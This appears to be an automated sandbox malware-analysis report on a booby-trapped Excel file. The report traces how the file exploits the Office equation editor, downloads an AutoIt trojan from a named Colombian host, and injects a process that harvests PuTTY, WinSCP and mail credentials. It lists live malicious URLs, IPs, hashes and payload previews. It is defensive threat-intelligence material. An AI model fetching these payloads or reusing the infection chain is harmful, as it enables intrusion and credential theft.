                  Process Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                  Access Token Manipulation                  		Proc Filesystem1
                  Application Window Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                  Process Injection                  		/etc/passwd and /etc/shadow1
                  System Owner/User Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  Remote System Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1574864 Sample: TR-AHYO-12-13-2024.xlam.xlsx Startdate: 13/12/2024 Architecture: WINDOWS Score: 100 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 Antivirus detection for URL or domain 2->42 44 16 other signatures 2->44 8 EXCEL.EXE 6 9 2->8         started        process3 file4 22 C:\Users\...\~$TR-AHYO-12-13-2024.xlam.xlsx, data 8->22 dropped 11 EQNEDT32.EXE 11 8->11         started        process5 dnsIp6 28 aquafusion.com.co 190.90.160.170, 49161, 80 GTDCOLOMBIASASCO Colombia 11->28 24 C:\Users\user\AppData\...\fryvcftyii.exe, PE32 11->24 dropped 26 C:\Users\user\AppData\Local\...\ngown[1].exe, PE32 11->26 dropped 54 Office equation editor establishes network connection 11->54 56 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->56 16 fryvcftyii.exe 4 11->16         started        file7 signatures8 process9 signatures10 30 Multi AV Scanner detection for dropped file 16->30 32 Binary is likely a compiled AutoIt script file 16->32 34 Machine Learning detection for dropped file 16->34 36 4 other signatures 16->36 19 RegSvcs.exe 2 16->19         started        process11 signatures12 46 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 19->46 48 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 19->48 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 2 other signatures 19->52

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  TR-AHYO-12-13-2024.xlam.xlsx63%ReversingLabsDocument-Office.Exploit.CVE-2017-11882
                  TR-AHYO-12-13-2024.xlam.xlsx100%AviraEXP/CVE-2017-11882.Gen

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ngown[1].exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\fryvcftyii.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ngown[1].exe74%ReversingLabsWin32.Trojan.AutoitInject
                  C:\Users\user\AppData\Local\Temp\fryvcftyii.exe74%ReversingLabsWin32.Trojan.AutoitInject

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://aquafusion.com.co/ngbx/ngown.exejjC:0%Avira URL Cloudsafe
                  http://aquafusion.com.co/ngbx/ngown.exeurC:0%Avira URL Cloudsafe
                  http://aquafusion.com.co/ngbx/ngown.exej0%Avira URL Cloudsafe
                  http://aquafusion.com.co/ngbx/ngown.exe100%Avira URL Cloudmalware

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  aquafusion.com.co
                  		190.90.160.170
                  		truetrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://aquafusion.com.co/ngbx/ngown.exetrue
                    • Avira URL Cloud: malware
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://aquafusion.com.co/ngbx/ngown.exejjC:EQNEDT32.EXE, 00000002.00000002.478445950.000000000062F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://aquafusion.com.co/ngbx/ngown.exeurC:EQNEDT32.EXE, 00000002.00000003.477488799.000000000069F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.478511726.000000000069F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://account.dyn.com/fryvcftyii.exe, 00000005.00000002.478291301.0000000000180000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.620624233.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                      		high
                      http://aquafusion.com.co/ngbx/ngown.exejEQNEDT32.EXE, 00000002.00000002.478879708.00000000036A0000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      190.90.160.170
                      		aquafusion.com.coColombia
                      		26619GTDCOLOMBIASASCOtrue

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1574864
                      Start date and time:2024-12-13 17:52:51 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 5m 39s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:defaultwindowsofficecookbook.jbs
                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                      Number of analysed new started processes analysed:9
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:TR-AHYO-12-13-2024.xlam.xlsx
                      Detection:MAL
                      Classification:mal100.troj.spyw.expl.evad.winXLSX@6/8@1/1
                      EGA Information:
                      • Successful, ratio: 66.7%
                      HCA Information:
                      • Successful, ratio: 97%
                      • Number of executed functions: 63
                      • Number of non-executed functions: 280
                      Cookbook Comments:
                      • Found application associated with file extension: .xlsx
                      • Found Word or Excel or PowerPoint or XPS Viewer
                      • Attach to Office via COM
                      • Active ActiveX Object
                      • Scroll down
                      • Close Viewer

                      Warnings

                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                      • Execution Graph export aborted for target RegSvcs.exe, PID 3560 because it is empty
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      • VT rate limit hit for: TR-AHYO-12-13-2024.xlam.xlsx

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      11:54:35API Interceptor189x Sleep call for process: EQNEDT32.EXE modified
                      11:54:43API Interceptor230x Sleep call for process: RegSvcs.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      190.90.160.170Nova naredba_HR-WJO-12-10-2024.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                      • aquafusion.com.co/ngbx/ngown.exe

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      aquafusion.com.coNova naredba_HR-WJO-12-10-2024.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                      • 190.90.160.170

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      GTDCOLOMBIASASCOChrome Browser Update.exeGet hashmaliciousPredatorBrowse
                      • 190.90.160.172
                      Nova naredba_HR-WJO-12-10-2024.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                      • 190.90.160.170
                      HUWwCrf0mn.elfGet hashmaliciousMirai, OkiruBrowse
                      • 179.50.127.137
                      b2bXo6vmDm.exeGet hashmaliciousSystemBCBrowse
                      • 190.90.160.165
                      file.exeGet hashmaliciousSystemBCBrowse
                      • 190.90.160.165
                      td2RgV6HyP.exeGet hashmaliciousSystemBCBrowse
                      • 190.90.160.165
                      mfyPnr7Rxa.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, StealcBrowse
                      • 190.90.160.170
                      6vTIdx359L.elfGet hashmaliciousMiraiBrowse
                      • 190.90.25.189
                      RFQ PO9845.xlsxGet hashmaliciousUnknownBrowse
                      • 190.90.160.170
                      HxZECaqzaM.elfGet hashmaliciousMiraiBrowse
                      • 179.50.6.161

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      C:\Users\user\AppData\Local\Temp\fryvcftyii.exeNova naredba_HR-WJO-12-10-2024.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ngown[1].exeNova naredba_HR-WJO-12-10-2024.xlam.xlsxGet hashmaliciousAgentTeslaBrowse

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ngown[1].exe

                          Download File
                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):1051136
                          Entropy (8bit):6.991830283498565
                          Encrypted:false
                          SSDEEP:24576:Tu6J33O0c+JY5UZ+XC0kGso6FaYLum4X1nJ6f7WY:9u0c++OCvkGs9FaYLume1nJ6SY
                          MD5:EF05B0557B2C8F0C951A1B21B812E75F
                          SHA1:11AAE265CC3F60806198436AC9571EEE720B908E
                          SHA-256:4BEC652194B91669F99A72CDC4DBD2DC25138E6DCD64E62248B5F69AA3539471
                          SHA-512:A2F6F831F43E277A19B49875C451F757A8B7E93C099260F8D4708B670AB81F690C9EBF68762FDF41C7F46D8F611791554B3175C0D2B7FE94C2EAA686B1060FC3
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 74%
                          Joe Sandbox View:
                          • Filename: Nova naredba_HR-WJO-12-10-2024.xlam.xlsx, Detection: malicious, Browse
                          Reputation:low
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L.....Wg.........."..........(.......}............@......................................@...@.......@.....................L...|....p...........................q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc........p......................@..@.reloc...q.......r..................@..B........................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\autEBA7.tmp

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\fryvcftyii.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):143138
                          Entropy (8bit):7.930415233954861
                          Encrypted:false
                          SSDEEP:3072:DzMtZ/oXgItrhkgxKHusdWsSDsQ2Zu5Odh2zTXrS0nPO4:DzMtZagyr6gxK9FSDsQ2wOdh2zT20V
                          MD5:051F32A5901FDF7C15EA93E86BBF3A0F
                          SHA1:B3D79BE4870E5FF8F11246BEE989AB950CC3FC73
                          SHA-256:045BA7B6656DE852E5F1F2F23598A5C936E059277382B1751E52A0D41BD80F53
                          SHA-512:9785B515803D739651B2255791AB70D3D74A4965FB0ECE28FC6A4D3FA807B6B1FCEB21FD62663AC7EB649D2FC02B8398932823BEA156C5F02C69D2B8911E8229
                          Malicious:false
                          Reputation:low
                          Preview:EA06.....Z....J.Q*T...a7.L..I........z`.ni...N..4..1S.f.y......?X.O.TY...6..,...fE]....{$.q+..k6..!j....].{=..'f;.../t..cg.H@....&t....K.M).).../.I....4>Tp.r.0....JD.V.4...ss:d.n...=..L..:T..i..&...\P.4;..S......@.]( ._6.c5...}...e.eD...v.r..``........i..h.P.s.1....d.Sd.Z..}Q...',X.!4..2.p._.$."G....jAJ.R..............\.*~8.....N3.......)....oO.')s*%P.............a...7.b.J...........\N...I7z.....n.....m...4..K...p7_....=.L.zn.W..U..9.3E..e.:..q..B,S.?.K..)X.>n.q..(Wl.....<.n..K.D....G..K$..,.{).G...Rc#......[..d}.n..I=.Z.T...X.D.=.V..%.Y3.=/.t..K.0....S.. @....@..n.0.....A@[1K..u...rR.h[...`.....h\..b.?..Dk.....tyn.W.s..1W...ei..........Z.Q.T.W......}..Vo:.._T.B.sy.*m0..f.z....s..9...7.Ui4j<6s..s2.......s}zY.G....:2...sf.>P...........4.t...."....)[ ..!%..d.x..K..M..=..l.Xb..A"...b.H..*.Zh.k,...3*%b..Z.....Z.Q*.(...2.Mht....M.M.`.D..H.B*T.|.....b.G..4..at.<&...B.,..& u...I...)...x.A.Z.BoL..c..e....XoQ...kI.3*...w.6.s&...j"..Z..zt..U.L.Z.e..

                          C:\Users\user\AppData\Local\Temp\autEBE7.tmp

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\fryvcftyii.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):14568
                          Entropy (8bit):7.633331238706717
                          Encrypted:false
                          SSDEEP:384:ITYznwMNeAOPPYLDfvWME/eTk5mUOY49D1nSH6RZ5DPsi6t:IAwJV8DfvWkOL4bSHsZ5rq
                          MD5:0B168D705ACB9CD0F87A19AA68B58ECF
                          SHA1:712895BE031EE9820A2E9BA626B70C2C97565D98
                          SHA-256:8D5450118D094BD586A153AB0E6DF9A14FB304C266623614FFA54A22C774E3AA
                          SHA-512:201E399EAA1E364526CEF3C38905EA4EB46635A806BBB95D03EEB2B2DBFF71EEEAAE68CD0EAB7466FAC9E1A7616C629EF14E92BC7B66BA1842BE9C87B3D0EB49
                          Malicious:false
                          Preview:EA06..0..[.....+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

                          C:\Users\user\AppData\Local\Temp\cerecloths

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\fryvcftyii.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):240128
                          Entropy (8bit):6.565914891381696
                          Encrypted:false
                          SSDEEP:6144:t78NtQ7umAd/qScP4S58xMk0T9an6gDTw:hstL3BI4Kk0T86sw
                          MD5:F5F22C9B86F5265099E677983B730EEA
                          SHA1:307810F6EC3796AF29924AAA7D2E28B8A600B386
                          SHA-256:95BE62558001287F393C2B33D1A48D894A3399D5E65A4A2664780C975E7DCFF8
                          SHA-512:CA841BC2593C0EBE4ACE6CFB190031761793688CD3CBD342CB78D397D39B8FF0F03895425A2E12CCAD4C47ACC94E10CA0CBD075EE228CECE6F1A9F6C51D656D9
                          Malicious:false
                          Preview:.j.L15CJ6DRM..07.25CJ2DR.EK07L25CJ2DRMEK07L25CJ2DRMEK07L25CJ.DRMKT.9L.<.k.E..d.X^?.E1%U63 e(QY"]Ac(Wd 8+kYYlvz.j_+6(kF==h25CJ2DR..K0{M15.g.!RMEK07L2.CH3OSFEK.4L2=CJ2DRM{.37L.5CJ.GRME.07l25CH2DVMEK07L21CJ2DRMEK03L27CJ2DRMGKp.L2%CJ"DRME[07\25CJ2DBMEK07L25CJ2..NE.07L2.@JtARMEK07L25CJ2DRMEK07.15OJ2DRMEK07L25CJ2DRMEK07L25CJ2DRMEK07L25CJ2DRMEK07L25Cj2DZMEK07L25CJ2LrME.07L25CJ2DRMk?UO825C..GRMeK07.15CH2DRMEK07L25CJ2dRM%eBD>Q5CJtARME.37L45CJ.GRMEK07L25CJ2D.ME..E)^Z J2HRMEK.4L27CJ2.QMEK07L25CJ2DR.EKr7L25CJ2DRMEK07L2..I2DRME.07L05FJ..PMQz17O25CK2DTMEK07L25CJ2DRMEK07L25CJ2DRMEK07L25CJ2DRMEK07L25CW......1.?!M.b.*.H._..:.}K.X.0$..ysN.....b>6..2.Lz..D....9.=F33.....WGC;+.Ek],.V.....b>r..K+.J..Kq.\Bv.l.j...~K&....C..V,'.%"=)..d-TT1#.F.LEK07.......$=.j.O=+wXJ.....%4d...:RME/07L@5CJSDRM.K07#25C$2DR3EK0IL25.J2D.MEK.7L2.CJ2)RMEo07LL5CJ.9]B...^?..CJ2DRx....!.....s..}A.2iW{..6...j2..:+.E.....>..Yy.]`/Tn..76J60AM6G^pK....7GN7FUIFG.9...k.b.|..=....H..MEK07L.5C.2DR..K.7L2.C.2..MEK..L.5.J...M

                          C:\Users\user\AppData\Local\Temp\fryvcftyii.exe

                          Download File
                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):1051136
                          Entropy (8bit):6.991830283498565
                          Encrypted:false
                          SSDEEP:24576:Tu6J33O0c+JY5UZ+XC0kGso6FaYLum4X1nJ6f7WY:9u0c++OCvkGs9FaYLume1nJ6SY
                          MD5:EF05B0557B2C8F0C951A1B21B812E75F
                          SHA1:11AAE265CC3F60806198436AC9571EEE720B908E
                          SHA-256:4BEC652194B91669F99A72CDC4DBD2DC25138E6DCD64E62248B5F69AA3539471
                          SHA-512:A2F6F831F43E277A19B49875C451F757A8B7E93C099260F8D4708B670AB81F690C9EBF68762FDF41C7F46D8F611791554B3175C0D2B7FE94C2EAA686B1060FC3
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 74%
                          Joe Sandbox View:
                          • Filename: Nova naredba_HR-WJO-12-10-2024.xlam.xlsx, Detection: malicious, Browse
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L.....Wg.........."..........(.......}............@......................................@...@.......@.....................L...|....p...........................q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc........p......................@..@.reloc...q.......r..................@..B........................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\oxmanship

                          Download File
                          Process:C:\Users\user\AppData\Local\Temp\fryvcftyii.exe
                          File Type:ASCII text, with very long lines (65536), with no line terminators
                          Category:dropped
                          Size (bytes):143378
                          Entropy (8bit):2.992214787701521
                          Encrypted:false
                          SSDEEP:96:AIXLr4j+F05BmsDo6Mi0Fl7dSA6suHCCGcuY9Ihyvuu3srWVjjGqnBaAJZdjureP:H30jU7qnGcuY9Ihyvuu3srWVeqnBaA
                          MD5:030C49A335A83FF97BCCA1A235B52F7A
                          SHA1:B2678A23F36BD3393EF5D9C90D4CAAF9A53C891E
                          SHA-256:CFAA9115C0D2FA15BF241234EC585B7012D2ADC7901A09516B804522B0A034AA
                          SHA-512:3F86EA7108B7E13AC16689B20F102748280473D580FD700FB1B5C342A8C6B6290C62B945B337C35C17AE621512223EA5D991D2ED1C140967DB4406CC6EFD724E
                          Malicious:false
                          Preview:dowp0dowpxdowp5dowp5dowp8dowpbdowpedowpcdowp8dowp1dowpedowpcdowpcdowpcdowp0dowp2dowp0dowp0dowp0dowp0dowp5dowp6dowp5dowp7dowpbdowp8dowp6dowpbdowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp8dowp4dowpbdowp9dowp6dowp5dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp8dowp6dowpbdowpadowp7dowp2dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp8dowp8dowpbdowp8dowp6dowpedowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp8dowpadowpbdowp9dowp6dowp5dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp8dowpcdowpbdowpadowp6dowpcdowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp8dowpedowpbdowp8dowp3dowp3dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowp5dowp9dowp0dowpbdowp9dowp3dowp2dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp4dowpddowp9dowp2dowpbdowpadowp2dowpedowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9dowp5dowp5dowp9dowp4dowpbdowp8dowp6dowp4dowp0dowp0dowp0dowp0dowp0dowp0dowp6dowp6dowp8dowp9

                          C:\Users\user\Desktop\~$TR-AHYO-12-13-2024.xlam.xls

                          Download File
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):165
                          Entropy (8bit):1.4377382811115937
                          Encrypted:false
                          SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                          MD5:797869BB881CFBCDAC2064F92B26E46F
                          SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                          SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                          SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                          Malicious:false
                          Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                          C:\Users\user\Desktop\~$TR-AHYO-12-13-2024.xlam.xlsx

                          Download File
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):165
                          Entropy (8bit):1.4377382811115937
                          Encrypted:false
                          SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                          MD5:797869BB881CFBCDAC2064F92B26E46F
                          SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                          SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                          SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                          Malicious:true
                          Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                          Static File Info

                          General

                          File type:Microsoft Excel 2007+
                          Entropy (8bit):7.998148374467102
                          TrID:
                          • Excel Microsoft Office Open XML Format document (35004/1) 81.40%
                          • ZIP compressed archive (8000/1) 18.60%
                          File name:TR-AHYO-12-13-2024.xlam.xlsx
                          File size:696'217 bytes
                          MD5:a278c0370e95b81fed05f5f16cd482c0
                          SHA1:af710a7cba9e1770a71b70889d8930d516241586
                          SHA256:f5eeb56fa4c609e146563f5f7a9798f34845455f039245b95fa9e436e453ed96
                          SHA512:a5af555784ac7103331648f8ddc94adbe5489a5315631c3695485a658ba7756ffc84fa7ab718414989a7515a5cfbc883b47f7a81dba0d5bf1e106fc29207c5fb
                          SSDEEP:12288:u+lrNY2Z8zZ2XiBU7WThZsSfUEO/03f01UCRwORXu8ZXySAPhskfDiu:du2ZOZ2kOycIUEU0cygE8Yb2kfDiu
                          TLSH:00E423D521E771D6D69E49CDA3FC2F89B9B671F80A09C35EFA10109D4BD6A8FC10CA12
                          File Content Preview:PK.........e.Yf;%7............[Content_Types].xmlUT....,\g.,\g.,\g.UMo.1..#..V.Vk'...lz.A.h.....'.&..=M...x..T.....~x<..{....;g.-.l.o...X.^.m|......w..(..6xh..2.^.~.x.G..e....1~."....<D..Y..$.o.D.j#;.of..B..........X.G..jG.c%.w..8.+T.3...u.\.R..h..d./.Q\.

                          File Icon

                          Icon Hash:2562ab89a7b7bfbf

                          Static OLE Info

                          General

                          Document Type:OpenXML
                          Number of OLE Files:1

                          OLE File "TR-AHYO-12-13-2024.xlam.xlsx"

                          Indicators
                          Has Summary Info:
                          Application Name:
                          Encrypted Document:False
                          Contains Word Document Stream:False
                          Contains Workbook/Book Stream:False
                          Contains PowerPoint Document Stream:False
                          Contains Visio Document Stream:False
                          Contains ObjectPool Stream:False
                          Flash Objects Count:0
                          Contains VBA Macros:False
                          Summary
                          Total Edit Time:0
                          Number of Pages:0
                          Number of Words:0
                          Number of Characters:0
                          Creating Application:Microsoft Excel
                          Security:0
                          Document Summary
                          Number of Lines:0
                          Number of Paragraphs:0
                          Thumbnail Scaling Desired:false
                          Contains Dirty Links:false
                          Shared Document:false
                          Changed Hyperlinks:false
                          Application Version:12.0000

                          Streams

                          Stream Path: \x1oLe10NAtIVE, File Type: data, Stream Size: 949248
                          General
                          Stream Path:\x1oLe10NAtIVE
                          CLSID:
                          File Type:data
                          Stream Size:949248
                          Entropy:5.943635063637233
                          Base64 Encoded:False
                          Data ASCII:. r . . . X . . y z . ? G . * Q 1 , _ 6 N . . U . _ d ) ) | . . C . < Z | s . . m . ) q . . } . 8 ( . g 8 6 . . . . . - & ` : @ { l P Y / | B 3 F h . ~ L x . . . m . Z b y . ~ 2 . . . l ( - . . p ? $ . L b u v . } I p ! . Z C . J ? . j I . j o . . . k : . o . . d . . J . ^ F . 5 . ^ . o j = " . V 4 ( K ! & f . Y . . x w S 1 . d E g 3 | . C b } 2 J . . . . N O . . H . . ; . . 2 T . . n . . y 5 . Y F F X d G B . . . @ < . . @ G . H . G } G . , . _ , F . Q = K . @ . 9 O 4 1 g f ' . O . _ . . p } J " "
                          Data Raw:c8 7f 72 06 02 15 ab 58 bd 88 01 08 79 7a bb bc bf dd dd 81 e3 3f bd 47 20 8b 13 8b 2a bb 51 31 f8 2c 81 c3 5f 36 4e d3 8b 1b 55 ff d3 83 c0 5f ff e0 64 29 bc 29 7c 2e 8e ed 9b 89 43 00 3c 5a 7c 73 98 07 c5 d4 c8 19 c6 6d db 03 29 9f 71 fc 0b 18 7d 09 38 af b9 b9 28 15 a1 e4 67 99 38 36 b2 a2 07 e9 df 01 00 00 1a f5 2d 26 87 c5 fd e4 bd 60 3a 40 ec 7b 6c ea 50 c6 59 2f 7c 42 33 46
                          Stream Path: uLbrtXnAY5qBGuoGHGh0AcuhK, File Type: empty, Stream Size: 0
                          General
                          Stream Path:uLbrtXnAY5qBGuoGHGh0AcuhK
                          CLSID:
                          File Type:empty
                          Stream Size:0
                          Entropy:0.0
                          Base64 Encoded:False
                          Data ASCII:
                          Data Raw:

                          Network Behavior

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Dec 13, 2024 17:54:38.976121902 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:39.097084999 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:39.097264051 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:39.097635984 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:39.217453003 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.341106892 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.341219902 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.341263056 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.341291904 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.341295958 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.341305971 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.341345072 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.341449022 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.341460943 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.341474056 CET8049161190.90.160.170192.168.2.22
